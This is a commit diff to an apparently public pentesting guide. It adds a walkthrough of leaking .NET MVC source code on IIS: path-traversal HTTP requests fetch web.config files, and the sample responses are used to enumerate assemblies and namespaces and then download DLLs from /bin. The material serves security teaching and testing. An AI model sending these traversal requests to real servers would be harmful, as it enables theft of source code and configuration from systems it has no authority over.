GitBook: [master] 440 pages modified

2024-11-15 01:17:36 +00:00 · 2021-04-01 12:55:58 +00:00 · 2021-04-01 12:55:58 +00:00 · 0e1bfa5efc
commit 0e1bfa5efc
parent c010d8f114
2 changed files with 109 additions and 8 deletions
--- a/mobile-apps-pentesting/android-app-pentesting/README.md
+++ b/mobile-apps-pentesting/android-app-pentesting/README.md
@ -751,9 +751,7 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th

 ### OWASP

-{% embed url="https://github.com/OWASP/owasp-mstg" %}
-
-{% embed url="https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication" %}
+{% embed url="https://github.com/OWASP/owasp-mstg%0Ahttps://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication" %}

 ### Git Repos

--- a/pentesting/pentesting-web/iis-internet-information-services.md
+++ b/pentesting/pentesting-web/iis-internet-information-services.md
@ -56,22 +56,93 @@ Use it without adding any extension, the files that need it have it already.

 ### Leaking source code

+{% hint style="info" %}
+As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.  
+From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.  
+Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.  
+Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
+{% endhint %}
+
 As any .Net application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identifies every binary file the application uses.

-```text
+```markup
 GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
 Host: example-mvc-application.minded
 [...]

 HTTP/1.1 200 OK
-[...]<?xml version="1.0" encoding="utf-8"?><configuration>
+[...]
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
  <configSections>
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
+  </configSections>
+  <appSettings>
+    <add key="webpages:Version" value="3.0.0.0" />
+    <add key="webpages:Enabled" value="false" />
+    <add key="ClientValidationEnabled" value="true" />
+    <add key="UnobtrusiveJavaScriptEnabled" value="true" />
+  </appSettings>
+<system.web>
+  <authentication mode="None" />
+  <compilation debug="true" targetFramework="4.6.1" />
+  <httpRuntime targetFramework="4.6.1" />
+</system.web>
+<system.webServer>
+  <modules>
+    <remove name="FormsAuthentication" />
+  </modules>
+</system.webServer>
+<runtime>
+  <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
+    <dependentAssembly>
+      <assemblyIdentity name="Microsoft.Owin.Security" />
+      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
+      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
+      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="Microsoft.Owin" />
+      <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
+      <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="System.Web.Optimization" />
+      <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="WebGrease" />
+      <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="System.Web.Helpers" />
+      <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="System.Web.Mvc" />
+      <bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
+    </dependentAssembly>
+    <dependentAssembly>
+      <assemblyIdentity name="System.Web.WebPages" />
+      <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
+    </dependentAssembly>
+  </assemblyBinding>
 ```

+In the previous output you can references to several "**assemblyIdentity**". These are files that may be located inside the /bin folder. For example: **/bin/WebGrease.dll.**
+
 Other files that could be found in the root directory of a .Net application are **/global.asax**

-```text
+```markup
 <%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
 ```

@ -89,7 +160,7 @@ And **/connectionstrings.config**

 In addition, .Net MVC applications are structured to define **other web.config files**, having the aim to include any declaration for specific namespaces for each set of viewpages, relieving developers to declare “@using” namespaces in every file.

-```text
+```markup
 GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
 Host: example-mvc-application.minded
 [...]
@ -124,14 +195,46 @@ Host: example-mvc-application.minded
 [...]
 ```

+From the previous output, inside the /bin directory you will also be able to find the Dlls 
+
+* System.Web.Mvc.dll
+* System.Web.Mvc.Ajax.dll
+* System.Web.Mvc.Html.dll
+* System.Web.Optimization.dll
+* System.Web.Routing.dll
+
 Let's suppose that the previous DLL is importing a namespace called **WebApplication1.Areas.Minded.** an attacker can infer that other web.config files are present in the application, in guessable/default paths as **/area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder.

-```text
+```markup
 GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
 Host: example-mvc-application.minded
 [...]
+
+HTTP/1.1 200 OK
+[...]
+<?xml version="1.0"?>
+<configuration>
+<configSections>
+  <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
+    <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
+    <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission="false" />
+  </sectionGroup>
+</configSections>
+<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
+<pages pageBaseType="System.Web.Mvc.WebViewPage">
+<namespaces>
+  <add namespace="System.Web.Mvc" />
+  <add namespace="System.Web.Mvc.Ajax" />
+  <add namespace="System.Web.Mvc.Html" />
+  <add namespace="System.Web.Routing" />
+  <add namespace="System.Web.Optimization" />
+  <add namespace="WebApplication1" />
+  <add namespace="WebApplication1.AdditionalFeatures" />
+</namespaces>
 ```

+Note how in the previous output you can see a new namespace called: **WebApplication1.AdditionalFeatures** which indicates that there is another Dll in the /bin folder called **WebApplication1.AdditionalFeatures.dll**
+
 ### Common files 

 From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)